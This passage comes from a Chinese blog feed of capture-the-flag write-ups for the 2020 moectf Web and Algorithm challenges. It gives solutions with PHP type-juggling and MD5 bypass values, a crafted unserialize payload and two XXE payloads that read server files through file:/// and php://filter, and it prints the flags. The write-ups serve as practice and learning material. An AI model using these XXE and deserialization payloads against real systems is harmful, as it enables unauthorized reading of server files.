alt="image-20201012213344797"></p><blockquote><p>moectf{0hhhh!!!y0u_know_h0w_to_u3e_eva1}</p></blockquote><h2 id="EzMath"><a href="#EzMath" class="headerlink" title="EzMath"></a>EzMath</h2><p>刷新那么快,肯定不能用手来算,这块就需要用脚本,这个题特别像bugku的一道题目:秋名山老司机。找了找之前的笔记,就有了这样一个脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line">url = <span class="string">'http://39.98.86.109:10001/index.php'</span></span><br><span class="line">s = requests.Session()</span><br><span class="line">source = s.get(url)</span><br><span class="line">expression = re.search(<span class="string">r'(\d+[+\-*])+(\d+)'</span>, source.text).group()</span><br><span class="line">result = <span class="built_in">eval</span>(expression)</span><br><span class="line">post = {<span class="string">'a'</span>: result}</span><br><span class="line">print(s.post(url, data = post).text)</span><br></pre></td></tr></table></figure><p>淦!!!复现的时候环境没了,,这里贴一下<a href="http://123.206.87.240:8002/qiumingshan/">秋名山老司机</a>这个题。可以尝试着把我上面的脚本改一下~</p><h2 id="三心二意"><a href="#三心二意" class="headerlink" title="三心二意"></a>三心二意</h2><p>先贴源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="variable">$a</span> = <span class="variable">$_GET</span>[<span class="string">'a'</span>];</span><br><span class="line"><span class="variable">$b</span> = <span class="variable">$_POST</span>[<span class="string">'b'</span>];</span><br><span class="line"><span class="variable">$c</span> = <span class="variable">$_REQUEST</span>[<span class="string">'c'</span>];</span><br><span class="line"><span class="variable">$d</span> = <span class="variable">$_COOKIE</span>[<span class="string">'d'</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$a</span>, <span class="variable">$b</span>, <span class="variable">$c</span>, <span class="variable">$d</span>)) {</span><br><span class="line"> highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span> (is_numeric(<span class="variable">$a</span>) <span class="keyword">and</span> <span class="variable">$a</span> == <span class="literal">false</span>) { <span class="comment">//a=0</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'A is OK!'</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<br/>'</span>;</span><br><span class="line"> <span class="keyword">if</span> (!is_numeric(<span class="variable">$b</span>) <span class="keyword">and</span> <span class="variable">$b</span> == <span class="number">0x125e591</span>) { <span class="comment">//b=19260817a</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'B is OK!'</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<br/>'</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$c</span> != <span class="number">240610708</span> <span class="keyword">and</span> md5(<span class="variable">$c</span>) == md5(<span class="number">240610708</span>)) { <span class="comment">//c=s214587387a</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'C is OK!'</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<br/>'</span>;</span><br><span class="line"> <span class="keyword">if</span> (strlen(<span class="variable">$d</span>) < <span class="number">7</span> <span class="keyword">and</span> <span class="variable">$d</span> != <span class="number">0</span> <span class="keyword">and</span> <span class="variable">$d</span> ** <span class="number">2</span> == <span class="number">0</span>) { <span class="comment">//d[]=</span></span><br><span class="line"> <span class="keyword">include</span>(<span class="string">'/flag'</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"D is not wanted.<br/>"</span>;</span><br><span class="line"> highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"C is not wanted.<br/>"</span>;</span><br><span class="line"> highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"Too young too simple.<br/>"</span>;</span><br><span class="line"> highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"A is not wanted.<br/>"</span>;</span><br><span class="line"> highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>一看就知道这个题目考察的是php语言的一些小tricks,先把a,b,c,d四个变量都设置值,然后再一个一个调</p><p>a不解释,,,</p><p>b不解释,,,</p><p>c是<a href="https://www.cnblogs.com/weiyinfu/p/6821812.html">md5绕过</a>,可以看下这篇文章</p><p>d不解释,,,</p><p>就这吧~爱会消失对不对</p><h2 id="俄罗斯头套"><a href="#俄罗斯头套" class="headerlink" title="俄罗斯头套"></a>俄罗斯头套</h2><p>这个题,没做过类似的,现场百度,查到这个题的考点是http响应头,那么这个题也就没什么说的了,抓包,改响应头……就完了</p><p>这里放两张修改后的:<img src="/images/2020moectf-Web/image-20201012225925372.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012225925372.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012225925372"></p><p><img src="/images/2020moectf-Web/image-20201012230029417.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012230029417.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012230029417"></p><blockquote><p>moectf{r3que5t_he4der_1s_ea5y!!}</p></blockquote><h2 id="include"><a href="#include" class="headerlink" title="include"></a>include</h2><p>盲猜文件包含漏洞,,,点开do not click???我偏要click,然后看源码:</p><p><img src="/images/2020moectf-Web/image-20201012230214247.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012230214247.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012230214247"></p><p>果然,和猜的一样。</p><p>先试一下:<img src="/images/2020moectf-Web/image-20201012230339016.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012230339016.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012230339016"></p><p>好吧,我想的有点简单了。他的flag应该是在注释里面,那我们把整个文件base64一下就好了:<img src="/images/2020moectf-Web/image-20201012230449160.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012230449160.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012230449160"></p><blockquote><?phpecho "Can you get the flag?";//moectf{php_is_the_best_language}</blockquote><h2 id="Moe-unserialize"><a href="#Moe-unserialize" class="headerlink" title="Moe unserialize"></a>Moe unserialize</h2><p>由题干猜考点:反序列化<br><img src="/images/2020moectf-Web/image-20201012230625656.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012230625656.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012230625656"></p><p>这里第一个考点是vim的备份文件,我们输入</p><blockquote><p> <a href="http://web.moectf.online/unserialize/.index.php.swp">http://web.moectf.online/unserialize/.index.php.swp</a></p></blockquote><p>下载文件,然后在wsl里面用vim把swp备份文件恢复</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Moe</span> </span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$a</span>;</span><br><span class="line"> <span class="keyword">protected</span> <span class="variable">$b</span>;</span><br><span class="line"> <span class="keyword">private</span> <span class="variable">$c</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">$this</span>->a === <span class="string">'1'</span> && <span class="keyword">$this</span>->b === <span class="string">'2'</span> && <span class="keyword">$this</span>->c === <span class="string">'3'</span>) {</span><br><span class="line"> <span class="keyword">include</span> <span class="string">'flag.php'</span>;</span><br><span class="line"> <span class="keyword">die</span>(<span class="variable">$flag</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="variable">$moe</span> = <span class="variable">$_GET</span>[<span class="string">'flag'</span>];</span><br><span class="line">unserialize(<span class="variable">$moe</span>);</span><br><span class="line"><span class="meta">?></span></span><br><span class="line">有一天,赤道企鹅在愉快的使用vim给学弟挖坑,突然伴随着身体的一阵抽搐,电脑死机了。企鹅悲痛欲绝,聪明的你能帮助企鹅找到他挖的坑吗?</span><br></pre></td></tr></table></figure><p>代码审计(阅读,写一个脚本生成序列化的结果</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Moe</span> </span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$a</span> = <span class="string">'1'</span>;</span><br><span class="line"> <span class="keyword">protected</span> <span class="variable">$b</span> = <span class="string">'2'</span>;</span><br><span class="line"> <span class="keyword">private</span> <span class="variable">$c</span> = <span class="string">'3'</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> Moe()</span><br><span class="line"><span class="keyword">echo</span> serialize(<span class="variable">$a</span>)</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p><img src="/images/2020moectf-Web/image-20201012234139309.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012234139309.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012234139309"></p><p>我们把这些内容get提交到flag里面,,,嗯???没反应???</p><p>这里感谢一下Noah大佬(Noah,yyds),他说:你个屈屈一个菜鸡bb,这里面有空字符没显示出来,你个辣鸡!!!</p><p>我留下了屈辱的泪水,然后便查了一下相关资料:</p><p><img src="/images/2020moectf-Web/image-20201012235635813.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012235635813.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012235635813"></p><p>知道直接复制粘贴网页上的内容是不行的,于是再次打开自己脚本的输出界面,Ctrl+U查看源代码,发现端倪:<img src="/images/2020moectf-Web/image-20201012235915242.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012235915242.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012235915242"></p><p>在这里我们就可以看到缺少的空字符,所以我们在get的时候手动加上%00就好了。<img src="/images/2020moectf-Web/image-20201013000007210.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201013000007210.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201013000007210"></p><h2 id="XXE"><a href="#XXE" class="headerlink" title="XXE"></a>XXE</h2><p>没接触过,即刻学习<a href="https://blog.csdn.net/qq_36197704/article/details/82255043,https://blog.51cto.com/dearch/2136021,https://www.cnblogs.com/zhaijiahui/p/9147595.html">XXE漏洞</a>然后又看了看i春秋上面的视频,就尝试做这个题目。</p><p>先大致代码审计(阅读一下</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">// flag is in '/flags/flag1.txt' and '/flags/flag2.php'</span></span><br><span class="line"></span><br><span class="line">libxml_disable_entity_loader (<span class="literal">false</span>);</span><br><span class="line"><span class="variable">$xmlfile</span> = file_get_contents(<span class="string">'php://input'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (strpos(<span class="variable">$xmlfile</span>,<span class="string">"flag1.txt"</span>) !== <span class="literal">FALSE</span>){</span><br><span class="line"> <span class="keyword">if</span> (strpos(<span class="variable">$xmlfile</span>,<span class="string">'file:/'</span>) === <span class="literal">FALSE</span>){</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"Please use file protocol.<br/><br/>"</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span> (strpos(<span class="variable">$xmlfile</span>,<span class="string">"flag2.php"</span>) !== <span class="literal">FALSE</span>){</span><br><span class="line"> <span class="keyword">if</span> (strpos(<span class="variable">$xmlfile</span>,<span class="string">'file:/'</span>) !== <span class="literal">FALSE</span>){</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"Why not try php://filter?"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<br/><br/>'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$dom</span> = <span class="keyword">new</span> DOMDocument();</span><br><span class="line"><span class="variable">$dom</span>->loadXML(<span class="variable">$xmlfile</span>, LIBXML_NOENT | LIBXML_DTDLOAD); </span><br><span class="line"><span class="variable">$test</span> = simplexml_import_dom(<span class="variable">$dom</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$test</span>;</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>知道题目先把flag分成两个部分,然后分别采用两种协议,所以我们需要写两个payload。</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?xml version = "1.0"?></span></span><br><span class="line"><span class="meta"><!DOCTYPE <span class="meta-keyword">ANY</span> [</span></span><br><span class="line"><span class="meta"><span class="meta"><!ENTITY f <span class="meta-keyword">SYSTEM</span> <span class="meta-string">"file:///flags/flag1.txt"</span>></span></span></span><br><span class="line"><span class="meta">]></span></span><br><span class="line"><span class="tag"><<span class="name">x</span>></span><span class="symbol">&f;</span><span class="tag"></<span class="name">x</span>></span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta"><?xml version = "1.0"?></span></span><br><span class="line"><span class="meta"><!DOCTYPE <span class="meta-keyword">ANY</span> [</span></span><br><span class="line"><span class="meta"><span class="meta"><!ENTITY f <span class="meta-keyword">SYSTEM</span> <span class="meta-string">"php://filter/read=convert.base64-encode/resource=/flags/flag2.php"</span>></span></span></span><br><span class="line"><span class="meta">]></span></span><br><span class="line"><span class="tag"><<span class="name">x</span>></span><span class="symbol">&f;</span><span class="tag"></<span class="name">x</span>></span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p><img src="/images/2020moectf-Web/image-20201013001310512.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201013001310512.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201013001310512"></p><p><img src="/images/2020moectf-Web/image-20201013001332613.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201013001332613.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201013001332613"></p><p>base64解一下:</p><blockquote><p>第一部分:moectf{XXE_</p><p>第二部分密文:PD9waHAgJGZsYWcyID0gJzRuZF9waHBfZjFsdDNyfSc7ID8+</p><p>第二部分:<?php $flag2 = '4nd_php_f1lt3r}'; ?></p><p>moectf{XXE_4nd_php_f1lt3r}</p></blockquote></blockquote>]]></content>
<categories>
<category> CTF比赛题解 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> wp </tag>
<tag> web </tag>
</tags>
</entry>
<entry>
<title>2020moectf Algorithm</title>
<link href="2020/10/13/2020moectf-Algorithm/"/>
<url>2020/10/13/2020moectf-Algorithm/</url>
<content type="html"><![CDATA[<p>这次的算法题,,,怎么说,,感觉真正考察算法的我都没写,就写了些不考察真正算法的题目</p><a id="more"></a><h2 id="mess"><a href="#mess" class="headerlink" title="mess"></a>mess</h2><img src="/images/2020moectf-Algorithm\image-20201009155437259.png" class="lazyload" data-srcset="/images/2020moectf-Algorithm\image-20201009155437259.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201009155437259" style="zoom:67%;"><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> random</span><br><span class="line">flag = <span class="string">'moectf{xxxxxxxxxxx}'</span></span><br><span class="line">digit = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> flag:</span><br><span class="line"> digit += <span class="built_in">str</span>(<span class="built_in">ord</span>(i))</span><br><span class="line">i = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> i < <span class="built_in">len</span>(digit):</span><br><span class="line"> n = random.randint(<span class="number">0</span>, <span class="number">128</span>)</span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">ord</span>(<span class="string">'a'</span>) <= n <= <span class="built_in">ord</span>(<span class="string">'z'</span>) <span class="keyword">or</span> <span class="built_in">ord</span>(<span class="string">'A'</span>) <= n <= <span class="built_in">ord</span>(<span class="string">'Z'</span>):</span><br><span class="line"> digit = digit[<span class="number">0</span>:i] + <span class="built_in">chr</span>(n) + digit[i:]</span><br><span class="line"> i += <span class="number">1</span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">'puzzle.txt'</span>, <span class="string">'w'</span>) <span class="keyword">as</span> out:</span><br><span class="line"> out.write(digit)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 1091111A01ruVJl99hw11Qv6i102xCYC1c2B31DIsz1tm212l11A1l610448re11BQ09549115951n154V895F115d49109h1m1210810j11w2A5</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>这个题说人话就是把flag的每一项转化成ASCII码全部列一排,再往之间插入字母。所以第一步把字母全部去除掉,然后手动把得到的一串数字分开,首先moectf{}的格式是确定的,然后大概眼睛瞅着,,就出来:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="built_in">string</span> a;</span><br><span class="line"><span class="built_in">cin</span>>>a;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<a.size();i++)</span><br><span class="line"><span class="keyword">if</span>(a[i]>=<span class="string">'0'</span> && a[i]<=<span class="string">'9'</span>)</span><br><span class="line"><span class="built_in">cout</span><<a[i];</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">} </span><br><span class="line"><span class="comment">//1091111A01ruVJl99hw11Qv6i102xCYC1c2B31DIsz1tm212l11A1l610448re11BQ09549115951n154V895F115d49109h1m1210810j11w2A5</span></span><br><span class="line"><span class="comment">//1091111019911610212311212111610448110954911595115489511549109112108101125</span></span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">a=[<span class="number">109</span>,<span class="number">111</span>,<span class="number">101</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">102</span>,<span class="number">123</span>,<span class="number">112</span>,<span class="number">121</span>,<span class="number">116</span>,<span class="number">104</span>,<span class="number">48</span>,<span class="number">110</span>,<span class="number">95</span>,<span class="number">49</span>,<span class="number">115</span>,<span class="number">95</span>,<span class="number">115</span>,<span class="number">48</span>,<span class="number">95</span>,<span class="number">115</span>,<span class="number">49</span>,<span class="number">109</span>,<span class="number">112</span>,<span class="number">108</span>,<span class="number">101</span>,<span class="number">125</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line"> print(<span class="built_in">chr</span>(i),end=<span class="string">''</span>)</span><br><span class="line"><span class="comment"># 109,111,101,99,116,102,123,112,121,116,104,48,110,95,49,115,95,115,48,95,115,49,109,112,108,101,125</span></span><br><span class="line"><span class="comment"># moectf{pyth0n_1s_s0_s1mple}</span></span><br></pre></td></tr></table></figure><h2 id="Frank-永远滴神"><a href="#Frank-永远滴神" class="headerlink" title="Frank, 永远滴神"></a>Frank, 永远滴神</h2><img src="/images/2020moectf-Algorithm\image-20201009175357736.png" class="lazyload" data-srcset="/images/2020moectf-Algorithm\image-20201009175357736.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201009175357736" style="zoom:67%;"><p>u1s1,这个题就是学习一下python怎么遍历文件夹,,害~看脚本吧:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> *</span><br><span class="line">count = <span class="number">0</span></span><br><span class="line">path = <span class="string">"自己的目录\puzzle"</span></span><br><span class="line">dirs1 = os.listdir(path)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> dirs1:</span><br><span class="line">path_1 = os.path.join(path,i)</span><br><span class="line">dirs2 = os.listdir(path_1)</span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> dirs2:</span><br><span class="line">path_2 = os.path.join(path_1,j)</span><br><span class="line">dirs3 = os.listdir(path_2)</span><br><span class="line"><span class="keyword">for</span> k <span 